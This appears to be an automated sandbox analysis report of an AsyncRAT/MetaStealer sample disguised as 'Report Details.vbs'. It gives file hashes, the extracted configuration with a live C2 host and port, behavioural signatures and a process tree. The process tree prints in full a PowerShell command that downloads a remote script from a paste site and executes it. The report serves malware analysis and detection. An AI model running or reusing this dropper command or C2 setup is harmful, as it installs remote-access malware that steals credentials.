asyncrat | fcd18b069a963b01f447b35ac7f12421ac36f8c577a1f19880ea0258e0505747

General

Target

Report Details.vbs
Size

57KB
MD5

52d94e55aac61768976f39040c288eef
SHA1

e942fa64351f106b614b28e86d3a42d50e5a0443
SHA256

fcd18b069a963b01f447b35ac7f12421ac36f8c577a1f19880ea0258e0505747
SHA512

fe278c9483992b979e356ec4380182d7519d47144cf3ed9c9caaf0346c4bcb788272562f57264ac7a3a35bf67e9e36ac19ec5d5a07d9564a99360de77b72b717

Score

10^/10

asyncrat metastealer default rat stealer

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://textbin.net/raw/x6lfwhnyrz

Extracted

Family

asyncrat

Version

1.0.7

Botnet

Default

C2

crazydns.linkpc.net:5900

Mutex

DcRatMutex_qwqdanchun

Attributes

delay
1
install
false
install_folder
%AppData%

aes.plain

Signatures

AsyncRat
AsyncRAT is designed to remotely monitor and control other computers.
rat asyncrat
Meta Stealer Stealer
Meta Stealer steals passwords stored in browsers, written in C++.
stealer metastealer

Async RAT payload 2 IoCs

rat

resource	yara_rule
behavioral2/memory/1892-152-0x000000000040CBCE-mapping.dmp	asyncrat
behavioral2/memory/1892-151-0x0000000000400000-0x0000000000412000-memory.dmp	asyncrat

Blocklisted process makes network request 1 IoCs

flow	pid	Process
2	3984	powershell.exe

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3751123196-3323558407-1869646069-1000\Control Panel\International\Geo\Nation	WScript.exe

Drops startup file 1 IoCs

description	ioc	Process
File created	C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ChromeUpdateHost.vbs	powershell.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 2308 set thread context of 1892	2308	powershell.exe	81

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 4 IoCs

pid	Process
3984	powershell.exe
3984	powershell.exe
2308	powershell.exe
2308	powershell.exe

Suspicious use of AdjustPrivilegeToken 3 IoCs

description	pid	Process
Token: SeDebugPrivilege	3984	powershell.exe
Token: SeDebugPrivilege	2308	powershell.exe
Token: SeDebugPrivilege	1892	AppLaunch.exe

Suspicious use of WriteProcessMemory 16 IoCs

description	pid	Process	procid_target
PID 3920 wrote to memory of 3984	3920	WScript.exe	76
PID 3920 wrote to memory of 3984	3920	WScript.exe	76
PID 3984 wrote to memory of 2308	3984	powershell.exe	78
PID 3984 wrote to memory of 2308	3984	powershell.exe	78
PID 2308 wrote to memory of 3484	2308	powershell.exe	79
PID 2308 wrote to memory of 3484	2308	powershell.exe	79
PID 3484 wrote to memory of 4804	3484	csc.exe	80
PID 3484 wrote to memory of 4804	3484	csc.exe	80
PID 2308 wrote to memory of 1892	2308	powershell.exe	81
PID 2308 wrote to memory of 1892	2308	powershell.exe	81
PID 2308 wrote to memory of 1892	2308	powershell.exe	81
PID 2308 wrote to memory of 1892	2308	powershell.exe	81
PID 2308 wrote to memory of 1892	2308	powershell.exe	81
PID 2308 wrote to memory of 1892	2308	powershell.exe	81
PID 2308 wrote to memory of 1892	2308	powershell.exe	81
PID 2308 wrote to memory of 1892	2308	powershell.exe	81

C:\Windows\System32\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\Report Details.vbs"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:3920
- C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -Command [System.Net.WebClient] $Client = New-Object System.Net.WebClient; [Byte[]] $DownloadedData = $Client.DownloadData('https://textbin.net/raw/x6lfwhnyrz'); [String] $ByteToString = [System.Text.UTF8Encoding]::UTF8.GetString($DownloadedData); [System.IO.File]::WriteAllText('C:\Users\Public\x6lfwhnyrz.PS1', $ByteToString, [System.Text.Encoding]::UTF8); Invoke-Expression 'PowerShell -ExecutionPolicy RemoteSigned -File C:\Users\Public\x6lfwhnyrz.PS1'
  2⤵
  - Blocklisted process makes network request
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:3984
- - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy RemoteSigned -File C:\Users\Public\x6lfwhnyrz.PS1
    3⤵
    - Drops startup file
    - Suspicious use of SetThreadContext
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:2308
  - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
      "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\tuvb0v1n\tuvb0v1n.cmdline"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:3484
    - - C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES9E67.tmp" "c:\Users\Admin\AppData\Local\Temp\tuvb0v1n\CSCD0EE30554F5A421791349537B20B738.TMP"
        5⤵
        
        PID:4804
  - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
      "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
      4⤵
      Suspicious use of AdjustPrivilegeToken
      PID:1892

Network

MITRE ATT&CK Enterprise v6

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
c20ac38ae3022e305b8752804aadf486

SHA1
4c144d6cfafb5c37ab4810ff3c1744df81493cdb

SHA256
03cba7e903a418a3966af1dc0debfb5fcfb2ac6d372ec48cb1b93c23e0fd1caf

SHA512
c9def9e5cd09d19b8b47a3f4c61893da715a6ba4b9933c885386d0425ee4ccc30d75eac1097511619d4e6259a46581f803fb38f78a15339391e4e78b0b6153e0

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES9E67.tmp

Filesize
1KB

MD5
cefb05c265ccad8e5b0a49d6e5376195

SHA1
9dfdd5bdb82a4eab87110155c9cfaa1ac7334016

SHA256
e0362a770609152d9a5750a27cd3432eeeb317280e1ff9bd43a8a392a4b81191

SHA512
9c06e96e063563e754b6e016cec05067e55a7a3137318802974e6610c522198aa7013b273cf93c3cd2a65658b1bfe7ec211cb43d0e878ce0d00340a15400dd8e

Download Submit
C:\Users\Admin\AppData\Local\Temp\tuvb0v1n\tuvb0v1n.dll

Filesize
11KB

MD5
778cb4699605b6202b4d0425d218ffb9

SHA1
08ff38268d27027d52ac09771df9d48710f55c4b

SHA256
6644307e91a1a170625691f3d65fbefcfd683e5ff26a49a021d0d622d4fba87d

SHA512
65cf0344c02d7aea25b3a503ae2279c0f3d4ac02d077ed8dec9334ae39bd61dd819a055aec09e866e401e813eb9a2254a7c22b69afa3a6ee0405704eea50f092

Download Submit
C:\Users\Public\x6lfwhnyrz.PS1

Filesize
119KB

MD5
8a4c64e0dc47055ac4df009b38c5c442

SHA1
1cfade9c2531a2721261df5f323b918a96fe6db7

SHA256
8d6d23ec88918ca2a42e1f578fa0d353bc6c93a557c9cf77a0704964fd9c9f8e

SHA512
18911c1ee6c579b5a4ceb79b0b7fe77f4e2af500a0851cbca9c67f2f852517ff25f352820c30dcde0081a99752765ae5d6d77d68f0d80056ac194fff4ee565f9

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tuvb0v1n\CSCD0EE30554F5A421791349537B20B738.TMP

Filesize
652B

MD5
f1a50919818bb4aa3e1c6a86a003b1dd

SHA1
e09e04eb8e0065b8a7cbda797e5e8de78421bd84

SHA256
c2c84de5750f03a818bfdcd59a35586c182be668bb65dfb3f314478f670e888e

SHA512
550b1c693448f651c2cb94d68beb5b4e79579dc6f50a58f9519bef1a69ae10b5e2b9ca2638b5cd341e3452d7bc81185a879e4dcd9e075b2fc2185da1dea05269

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tuvb0v1n\tuvb0v1n.0.cs

Filesize
14KB

MD5
5b28648a4e188b0ebdf2d5edcda61624

SHA1
faf0ba6c2ef8d8184881eda8a276796449969e1c

SHA256
e92acafc5a9dd128b120809aaf76178275c3d22b13fb7cc2f0d9c624befed1b1

SHA512
972fca6205f8927363b751ff51c6cf07c3b42f7cbd8fbe12c1098df539118ecf3d3ce1af3b5d376c8710ed183786fc911279ff81941aba4202a11ca5670b9937

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\tuvb0v1n\tuvb0v1n.cmdline

Filesize
327B

MD5
65af6f2373aca81d0601a4d9e64b5e60

SHA1
e4e73f2ee2f76eba6b7dcae540fe80fc55bf1a24

SHA256
86d511c2c62163d8a46a35784fea03d4a5589ac49413d1eb28551bb6597e70fb

SHA512
2b09bc5241bd6a72fd02924d291e90db56408c68e4775758d21d9628fed6e6bdcf0e5db0b5c95ffdb3a90f3fe64b2889f1986b17a21a41bbcbc0739448d63c28

Download Submit
memory/1892-156-0x0000000005AA0000-0x0000000005B06000-memory.dmp

Filesize
408KB

Download
memory/1892-155-0x0000000005FE0000-0x0000000006584000-memory.dmp

Filesize
5.6MB

Download
memory/1892-154-0x0000000005990000-0x0000000005A2C000-memory.dmp

Filesize
624KB

Download
memory/1892-151-0x0000000000400000-0x0000000000412000-memory.dmp

Filesize
72KB

Download
memory/2308-139-0x0000020648FB0000-0x00000206494D8000-memory.dmp

Filesize
5.2MB

Download
memory/2308-138-0x0000020648A00000-0x0000020648A76000-memory.dmp

Filesize
472KB

Download
memory/2308-142-0x000002062CE93000-0x000002062CE95000-memory.dmp

Filesize
8KB

Download
memory/2308-141-0x000002062CE90000-0x000002062CE92000-memory.dmp

Filesize
8KB

Download
memory/2308-143-0x000002062CE96000-0x000002062CE98000-memory.dmp

Filesize
8KB

Download
memory/2308-140-0x00007FF895FC0000-0x00007FF896A81000-memory.dmp

Filesize
10.8MB

Download
memory/3984-135-0x000001C371C93000-0x000001C371C95000-memory.dmp

Filesize
8KB

Download
memory/3984-133-0x000001C371C96000-0x000001C371C98000-memory.dmp

Filesize
8KB

Download
memory/3984-134-0x000001C371C90000-0x000001C371C92000-memory.dmp

Filesize
8KB

Download
memory/3984-132-0x00007FF895FC0000-0x00007FF896A81000-memory.dmp

Filesize
10.8MB

Download
memory/3984-131-0x000001C371CD0000-0x000001C371CF2000-memory.dmp

Filesize
136KB

Download

Resubmissions

Analysis

Sharing

General

Malware Config

Extracted

Extracted

Signatures

Processes

Network

MITRE ATT&CK Enterprise v6

Replay Monitor

Loading Replay Monitor...

Downloads